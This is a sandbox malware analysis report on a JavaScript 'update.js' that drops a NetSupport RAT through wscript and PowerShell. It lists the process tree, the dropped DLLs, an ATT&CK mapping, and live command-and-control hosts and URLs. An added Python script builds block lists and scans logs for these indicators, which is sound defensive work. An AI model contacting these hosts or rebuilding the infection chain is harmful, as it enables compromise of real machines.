                                Source: Yara match | File source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\pcicapi.dll, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLL, type: DROPPED
                                MITRE ATT&CK matrix (numbers in parentheses are the count of signatures the report attributes to that technique):

                                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                                | Gather Victim Identity Information | Scripting (12) | Valid Accounts (2) | Windows Management Instrumentation (1) | Scripting (12) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | Input Capture (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1) |
                                | Credentials | Domains | Default Accounts | Native API (4) | DLL Side-Loading (1) | Valid Accounts (2) | Obfuscated Files or Information (4) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Screen Capture (1) | Encrypted Channel (21) | Exfiltration Over Bluetooth | Defacement (1) |
                                | Email Addresses | DNS Server | Domain Accounts | Exploitation for Client Execution (1) | Valid Accounts (2) | Access Token Manipulation (21) | Software Packing (11) | Security Account Manager | File and Directory Discovery (3) | SMB/Windows Admin Shares | Input Capture (1) | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact |
                                | Employee Names | Virtual Private Server | Local Accounts | Command and Scripting Interpreter (1) | Windows Service (1) | Windows Service (1) | DLL Side-Loading (1) | NTDS | System Information Discovery (35) | Distributed Component Object Model | Clipboard Data (3) | Application Layer Protocol (14) | Traffic Duplication | Data Destruction |
                                | Gather Victim Network Information | Server | Cloud Accounts | Service Execution (2) | Registry Run Keys / Startup Folder (1) | Process Injection (113) | Masquerading (1) | LSA Secrets | Security Software Discovery (141) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                                | Domain Properties | Botnet | Replication Through Removable Media | PowerShell (3) | RC Scripts | Registry Run Keys / Startup Folder (1) | Valid Accounts (2) | Cached Domain Credentials | Process Discovery (2) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (31) | DCSync | Virtualization/Sandbox Evasion (31) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                                | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (21) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                                | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (113) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                                Behavior Graph (ID: 1518513; Sample: update.js; Start date: 25/09/2024; Architecture: WINDOWS; Score: 100)

                                Sample-level entries: roadrunnersell.com; geo.netsupportsoftware.com; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 7 other signatures.

                                Process tree recovered from the graph:
                                • wscript.exe (three instances started)
                                  Network: roadrunnersell.com (79.141.163.131; ports 443, 49704, 49705; HZ-US-ASBG, Bulgaria)
                                  Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found; System process connects to network (likely due to code injection or exploit)
                                  • powershell.exe (started by wscript.exe)
                                    Dropped: C:\Users\user\AppData\...\remcmdstub.exe (PE32); C:\Users\user\AppData\Roaming\...\pcicapi.dll (PE32); C:\Users\user\AppData\...\client32.exe (PE32); 6 other files (5 malicious)
                                    Signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
                                    • client32.exe (started by powershell.exe)
                                      Network: 5.181.159.137 (ports 443, 49706; MIVOCLOUDMD, Moldova Republic of); geo.netsupportsoftware.com (104.26.1.231; ports 49707, 80; CLOUDFLARENETUS, United States)
                                      Signatures: Multi AV Scanner detection for dropped file; Contains functionalty to change the wallpaper; Delayed program exit found
                                    • conhost.exe (started by powershell.exe)

                                No Antivirus matches
                                | Source | Detection | Scanner | Label |
                                |---|---|---|---|
                                | C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL | 13% | ReversingLabs | Win32.Trojan.Generic |
                                | C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLL | 5% | ReversingLabs | |
                                | C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLL | 17% | ReversingLabs | |
                                | C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLL | 6% | ReversingLabs | |
                                | C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | 27% | ReversingLabs | Win32.Trojan.NetSupport |
                                | C:\Users\user\AppData\Roaming\HHIAHYOW-5\msvcr100.dll | 0% | ReversingLabs | |
                                | C:\Users\user\AppData\Roaming\HHIAHYOW-5\pcicapi.dll | 3% | ReversingLabs | |
                                | C:\Users\user\AppData\Roaming\HHIAHYOW-5\remcmdstub.exe | 24% | ReversingLabs | Win32.Trojan.Generic |
                                No Antivirus matches
                                No Antivirus matches
Antivirus detection, URLs (Source | Detection | Scanner | Label)
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p | 0% | Avira URL Cloud | safe
https://github.com/apache/incubator-echarts/issues/11369 | 0% | Avira URL Cloud | safe
https://www.google.com/intl/en-US/chrome/blank.html | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Avira URL Cloud | safe
https://roadrunnersell.com/trade/d.php?5517 | 100% | Avira URL Cloud | malware
https://www-googleapis-staging.sandbox.google.comHlY | 0% | Avira URL Cloud | safe
https://www-googleapis-staging.sandbox.google.comX | 0% | Avira URL Cloud | safe
https://roadrunnersell.com/ | 100% | Avira URL Cloud | malware
https://roadrunnersell.com/9 | 100% | Avira URL Cloud | malware
http://geo.netsupportsoftware.com/location/loca.asp | 0% | Avira URL Cloud | safe
https://github.com/apache/echarts/issues/14266 | 0% | Avira URL Cloud | safe
http://5.181.159.137/fakeurl.htm | 0% | Avira URL Cloud | safe
http://127.0.0.1 | 0% | Avira URL Cloud | safe
https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js | 0% | Avira URL Cloud | safe
https://jsperf.com/try-catch-performance-overhead | 0% | Avira URL Cloud | safe
http://0.30000000000000004.com/ | 0% | Avira URL Cloud | safe
https://jsbench.me/2vkpcekkvw/1) | 0% | Avira URL Cloud | safe
https://momentjs.com/ | 0% | Avira URL Cloud | safe
https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js | 0% | Avira URL Cloud | safe
http://%s/testpage.htm | 0% | Avira URL Cloud | safe
https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/Variable1CompositeOperatio | 0% | Avira URL Cloud | safe
http://%s/fakeurl.htm | 0% | Avira URL Cloud | safe
https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js | 0% | Avira URL Cloud | safe
https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight | 0% | Avira URL Cloud | safe
https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel) | 0% | Avira URL Cloud | safe
https://www-googleapis-staging.sandbox.google.com(d | 0% | Avira URL Cloud | safe
https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf | 0% | Avira URL Cloud | safe
https://github.com/apache/incubator-echarts/issues/12229 | 0% | Avira URL Cloud | safe
https://roadrunnersell.com/trade/fix.php?532d | 100% | Avira URL Cloud | malware
https://github.com/ecomfe/zrender/blob/master/LICENSE.txt | 0% | Avira URL Cloud | safe
https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment). | 0% | Avira URL Cloud | safe
https://www-googleapis-staging.sandbox.google.com | 0% | Avira URL Cloud | safe
https://roadrunnersell.com/trade/fix.php?532 | 100% | Avira URL Cloud | malware
https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js | 0% | Avira URL Cloud | safe
https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
geo.netsupportsoftware.com | 104.26.1.231 | true | false | - | unknown
roadrunnersell.com | 79.141.163.131 | true | true | - | unknown

URLs contacted (Name | Malicious | Antivirus Detection | Reputation)
http://geo.netsupportsoftware.com/location/loca.asp | false | Avira URL Cloud: safe | unknown
https://roadrunnersell.com/trade/d.php?5517 | true | Avira URL Cloud: malware | unknown
http://5.181.159.137/fakeurl.htm | true | Avira URL Cloud: safe | unknown
https://roadrunnersell.com/trade/fix.php?532 | true | Avira URL Cloud: malware | unknown
URL strings found in process memory (Name | Source | Malicious | Antivirus Detection | Reputation)

Most of the wscript.exe strings below are URLs from comments in JavaScript library source (Apache ECharts and zrender, D3, Moment.js, Closure Library) carried inside the script; the report records no DNS lookup or connection to any of them, and only the roadrunnersell.com strings are operator infrastructure. The three client32.exe strings are NetSupport client format strings; the %s is filled in with the configured gateway, which is how the contacted URL http://5.181.159.137/fakeurl.htm above arises.

Memory dump set A (wscript.exe): 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmp
Memory dump set B (wscript.exe): 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp

https://github.com/apache/incubator-echarts/issues/11369 | set A | false | Avira URL Cloud: safe | unknown
https://roadrunnersell.com/9 | wscript.exe, 00000000.00000003.1356140379.000002BB7E3D2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0 | sets A and B, plus wscript.exe, 00000009.00000003.1301369817.000002B2D2997000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p | set B, plus wscript.exe, 00000000.00000003.1450836451.000002BB045AD000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1192606451.000002BB00351000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1323964009.000002B2CFBED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/intl/en-US/chrome/blank.html | set B, plus wscript.exe, 00000000.00000003.1234026826.000002BB03AB1000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1367815908.000002BB0934F000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1492692788.000002BB03AD5000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1419923881.000002BB039EA000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1425244635.000002B2D3321000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://roadrunnersell.com/ | wscript.exe, 00000000.00000003.1353432566.000002BB08E4D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1356140379.000002BB7E3D2000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://www-googleapis-staging.sandbox.google.comHlY | wscript.exe, 00000000.00000003.1237831355.000002BB00596000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www-googleapis-staging.sandbox.google.comX | wscript.exe, 00000000.00000003.1396552350.000002BB06742000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/apache/echarts/issues/14266 | set A | false | Avira URL Cloud: safe | unknown
https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js | set A | false | Avira URL Cloud: safe | unknown
https://jsperf.com/try-catch-performance-overhead | set A | false | Avira URL Cloud: safe | unknown
https://jsbench.me/2vkpcekkvw/1) | set B | false | Avira URL Cloud: safe | unknown
http://%s/testpage.htm | client32.exe | false | Avira URL Cloud: safe | unknown
http://0.30000000000000004.com/ | set B | false | Avira URL Cloud: safe | unknown
http://127.0.0.1 | client32.exe | false | Avira URL Cloud: safe | unknown
https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js | set B | false | Avira URL Cloud: safe | unknown
https://momentjs.com/ | set B | false | Avira URL Cloud: safe | unknown
https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/Variable1CompositeOperatio | set B | false | Avira URL Cloud: safe | unknown
https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel) | set A | false | Avira URL Cloud: safe | unknown
http://%s/fakeurl.htm | client32.exe | false | Avira URL Cloud: safe | unknown
https://github.com/apache/incubator-echarts/issues/12229 | set A | false | Avira URL Cloud: safe | unknown
https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js | set A | false | Avira URL Cloud: safe | unknown
https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight | set A | false | Avira URL Cloud: safe | unknown
https://www-googleapis-staging.sandbox.google.com(d | wscript.exe, 00000009.00000003.1439411024.000002B2CFE05000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://roadrunnersell.com/trade/fix.php?532d | wscript.exe, 00000009.00000003.2124586436.000002B2CDE34000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf | set A | false | Avira URL Cloud: safe | unknown
https://github.com/ecomfe/zrender/blob/master/LICENSE.txt | set B | false | Avira URL Cloud: safe | unknown
https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment). | set B | false | Avira URL Cloud: safe | unknown
https://www-googleapis-staging.sandbox.google.com | set B, plus wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js | set B | false | Avira URL Cloud: safe | unknown
https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js | set A | false | Avira URL Cloud: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
5.181.159.137 | unknown | Moldova Republic of | 39798 | MIVOCLOUDMD | true
79.141.163.131 | roadrunnersell.com | Bulgaria | 202015 | HZ-US-ASBG | true
104.26.1.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
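How to act on the indicators in these tables depends on who owns them. roadrunnersell.com and 5.181.159.137 are operator infrastructure; geo.netsupportsoftware.com is NetSupport's own geolocation service, which the legitimate client also queries (the context tables further down show every NetSupport RAT sample there contacting it), so it is a pivot for finding clients rather than a blocklist entry. Note too that Avira rates http://5.181.159.137/fakeurl.htm "safe" while the sandbox flags it malicious: /fakeurl.htm is just the probe path client32.exe carries as "http://%s/fakeurl.htm", with %s filled in from the configured gateway, so the host is the indicator, not the path. The Python below is an added example by the editor, not Joe Sandbox tooling: it transcribes the report rows, derives block and hunt sets, and scans constructed proxy log lines against them (203.0.113.9 is a documentation-range address standing in for an unknown gateway).

```python
"""IOC triage for the network indicators in the tables above, plus a scan of
proxy log lines against them.

Added example by the editor, not Joe Sandbox tooling. The REPORT_* rows are
transcribed from this report; SAMPLE_LOG lines are constructed (203.0.113.9 is a
documentation-range address standing in for an unknown gateway).
"""
import ipaddress
import re
from urllib.parse import urlsplit

# (url, sandbox 'Malicious' flag, Avira URL Cloud verdict) from the contacted-URL table.
REPORT_URLS = [
    ("http://geo.netsupportsoftware.com/location/loca.asp", False, "safe"),
    ("https://roadrunnersell.com/trade/d.php?5517", True, "malware"),
    ("http://5.181.159.137/fakeurl.htm", True, "safe"),
    ("https://roadrunnersell.com/trade/fix.php?532", True, "malware"),
]
# ip -> (ASN name, sandbox 'Malicious' flag) from the IP table.
REPORT_IPS = {
    "5.181.159.137": ("MIVOCLOUDMD", True),
    "79.141.163.131": ("HZ-US-ASBG", True),
    "104.26.1.231": ("CLOUDFLARENETUS", False),
}
# NetSupport's own geolocation service: a pivot for finding clients, not a blocklist entry.
VENDOR_HOSTS = {"geo.netsupportsoftware.com"}
# Paths client32.exe carries as "http://%s/fakeurl.htm" and "http://%s/testpage.htm";
# %s is the configured gateway, so an unknown IP serving these paths is worth a look.
GATEWAY_PROBES = {"/fakeurl.htm", "/testpage.htm"}


def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def build_iocs():
    """Block on hosts, not full URLs: the query ids (?5517, ?532, ?532d) vary.
    The sandbox flag overrides a vendor 'safe' verdict (5.181.159.137/fakeurl.htm)."""
    block, hunt = set(), set()
    for url, malicious, verdict in REPORT_URLS:
        host = urlsplit(url).hostname
        if host in VENDOR_HOSTS:
            hunt.add(host)
        elif malicious or verdict == "malware":
            block.add(host)
    for ip, (_asn, malicious) in REPORT_IPS.items():
        if malicious:  # 104.26.1.231 is Cloudflare anycast; only meaningful with its hostname
            block.add(ip)
    return {"block": block, "hunt": hunt}


LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")

SAMPLE_LOG = [  # constructed
    "2024-09-25T13:03:10Z 10.0.0.15 GET https://roadrunnersell.com/trade/fix.php?532d 200",
    "2024-09-25T13:03:12Z 10.0.0.15 GET http://5.181.159.137/fakeurl.htm 200",
    "2024-09-25T13:03:13Z 10.0.0.15 GET http://geo.netsupportsoftware.com/location/loca.asp 200",
    "2024-09-25T13:05:00Z 10.0.0.22 GET http://203.0.113.9/fakeurl.htm 200",
    "2024-09-25T13:06:00Z 10.0.0.31 GET https://www.google.com/intl/en-US/chrome/blank.html 200",
]


def scan_proxy_log(lines, iocs):
    """Return (severity, client, host, path) for lines touching an indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["url"])
        host = parts.hostname or ""
        if host in iocs["block"]:
            severity = "high"
        elif host in iocs["hunt"]:
            severity = "medium"
        elif parts.path in GATEWAY_PROBES and is_ip(host):
            severity = "medium"
        else:
            continue
        hits.append((severity, m["src"], host, parts.path))
    return hits


if __name__ == "__main__":
    iocs = build_iocs()
    print("block:", sorted(iocs["block"]), "hunt:", sorted(iocs["hunt"]))
    for hit in scan_proxy_log(SAMPLE_LOG, iocs):
        print(*hit)
```

The gateway-probe rule is the one that generalises beyond this sample: a client32.exe whose configuration points at a gateway not in any report will still request /fakeurl.htm or /testpage.htm from it, so a raw IP serving those paths is a lead even when the IP itself is unknown.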
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1518513
Start date and time: 2024-09-25 19:01:26 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: update.js
Detection: MAL
Classification: mal100.rans.troj.expl.evad.winJS@8/29@2/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 55%
• Number of executed functions: 116
• Number of non-executed functions: 257
Cookbook Comments:
• Found application associated with file extension: .js
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: update.js

Timeline (Time | Type | Description)
13:02:32 | API Interceptor | 44x Sleep call for process: powershell.exe modified
13:03:09 | API Interceptor | 5158442x Sleep call for process: client32.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    5.181.159.137Update.jsGet hashmaliciousNetSupport RATBrowse
                                    • http://5.181.159.137/fakeurl.htm
                                    104.26.1.231SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    upd_8707558.msixGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    Update.jsGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    FakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    SAPConcur.msixGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    HQuxVxuLV.ps1Get hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    Advanced Scanner.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    R6aeFGF7gU.exeGet hashmaliciousNetSupport RATBrowse
                                    • geo.netsupportsoftware.com/location/loca.asp
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    geo.netsupportsoftware.comqvoLvRpRbr.msiGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    EMX97rT0GX.msiGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    Support_auto.msiGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                    • 172.67.68.212
                                    SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.1.231
                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                    • 172.67.68.212
                                    SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                    • 172.67.68.212
                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.0.231
                                    upd_8707558.msixGet hashmaliciousNetSupport RATBrowse
                                    • 104.26.1.231
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    MIVOCLOUDMDMRSPBASd65554AB.dll.dllGet hashmaliciousUnknownBrowse
                                    • 94.158.245.136
                                    MRSPBASd65554AB.dll.dllGet hashmaliciousUnknownBrowse
                                    • 94.158.245.136
                                    Update.jsGet hashmaliciousNetSupport RATBrowse
                                    • 5.181.159.137
                                    ZWlwrTM9HK.exeGet hashmaliciousRemcosBrowse
                                    • 5.181.156.117
                                    Gez0dmj6yl.exeGet hashmaliciousDCRatBrowse
                                    • 94.158.244.70
                                    update.jsGet hashmaliciousNetSupport RATBrowse
                                    • 5.181.159.28
17E503AEF3804C0513838FB4AE3E00F323B1260BF753D99DBF0AE415BA54DE11.exe | malicious | Bdaejec, Raccoon | 194.180.191.241
updates.js | malicious | NetSupport RAT | 194.180.191.69
updates.js | malicious | NetSupport RAT | 94.158.245.103
Update 124.0.6367.158.js | malicious | NetSupport RAT | 94.158.245.103
Match: HZ-US-ASBG
https://premium.davidabostic.com | malicious | Unknown | 185.33.84.157
https://chefspavilion.com/cdn-vs/original.js | malicious | Unknown | 185.33.85.42
https://chefspavilion.com/cdn-vs/original.js | malicious | Unknown | 185.33.85.42
http://www.wbdg.org | malicious | Unknown | 185.33.85.42
http://www.wbdg.org | malicious | Unknown | 185.33.85.42
https://premium.davidabostic.com/ | malicious | Unknown | 185.33.84.157
Update.js | malicious | NetSupport RAT | 79.141.161.172
http://premium.davidabostic.com | malicious | Unknown | 185.33.84.157
http://premium.davidabostic.com | malicious | Unknown | 185.33.84.157
http://premium.davidabostic.com | malicious | Unknown | 185.33.84.157
Match: CLOUDFLARENETUS
inquiry.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
https://www.google.fr/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2F%63%61%73%61%64%65%72%65%73%74%61%75%72%61%63%69%6F%6E%6F%6E%6C%69%6E%65%2E%63%6F%6D%2F%68%6F%6C%79%2F%69%6E%64%65%78%73%79%6E%31%2E%68%74%6D%6C%23c2FyYWhsQGNkYXRhLmNvbQ== | malicious | Unknown | 104.21.34.147
HHXyi02DYl.exe | malicious | LummaC | 104.21.51.224
TRmSF36qQG.exe | malicious | FormBook | 188.114.97.3
https://maveuve.github.io/frlpodf/marynewreleasefax.html | malicious | Remcos | 104.18.95.41
bYQ9uTqLzz.exe | malicious | LummaC | 172.67.208.139
LcDQjpdIiU.exe | malicious | LummaC | 172.67.206.221
BLHvvl44N0.exe | malicious | LummaC, Go Injector, LummaC Stealer | 172.67.206.221
7Ekgc5sWNB.exe | malicious | LummaC | 172.67.132.154
HHXyi02DYl.exe | malicious | Unknown | 104.21.51.224
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
LJ1IZDkHyE.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer | 79.141.163.131
inquiry.exe | malicious | Snake Keylogger, VIP Keylogger | 79.141.163.131
Confirmaci#U00f3n de pago_shrunk.exe | malicious | AgentTesla | 79.141.163.131
SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe | malicious | Snake Keylogger, VIP Keylogger | 79.141.163.131
SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe | malicious | MicroClip | 79.141.163.131
file.exe | malicious | LummaC, Vidar | 79.141.163.131
file.exe | malicious | LummaC, Vidar | 79.141.163.131
https://osoulksa.com/c/Fidelityme | malicious | HTMLPhisher | 79.141.163.131
http://rkanet.com | malicious | Unknown | 79.141.163.131
NTGcon.msi | malicious | Unknown | 79.141.163.131
Match: 37f463bf4616ecd445d4a1937da06e19
file.exe | malicious | LummaC, Vidar | 79.141.163.131
file.exe | malicious | LummaC, Vidar | 79.141.163.131
Zeskanowana lista przedmiot#U00f3w nr 84329.vbs | malicious | FormBook, GuLoader | 79.141.163.131
file.exe | malicious | LummaC, Stealc, Vidar | 79.141.163.131
file.exe | malicious | LummaC, Vidar | 79.141.163.131
SDWLLRJcsY.exe | malicious | Remcos, GuLoader | 79.141.163.131
D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe | malicious | FormBook, GuLoader | 79.141.163.131
cDErPwSuCB.exe | malicious | Unknown | 79.141.163.131
tpq.ps1 | malicious | Unknown | 79.141.163.131
Kv1tZKstAC.exe | malicious | Unknown | 79.141.163.131
Match | Associated Sample Name / URL | Detection | Threat Name
Match: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLL
Update.js | malicious | NetSupport RAT
update.js | malicious | NetSupport RAT
updates.js | malicious | NetSupport RAT
updates.js | malicious | NetSupport RAT
Update 124.0.6367.158.js | malicious | NetSupport RAT
updates.js | malicious | NetSupport RAT
Update 124.0.6367.158.js | malicious | NetSupport RAT
Update_124.0.6367.158.js | malicious | NetSupport RAT
MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip | malicious | NetSupport RAT
update.js | malicious | NetSupport RAT
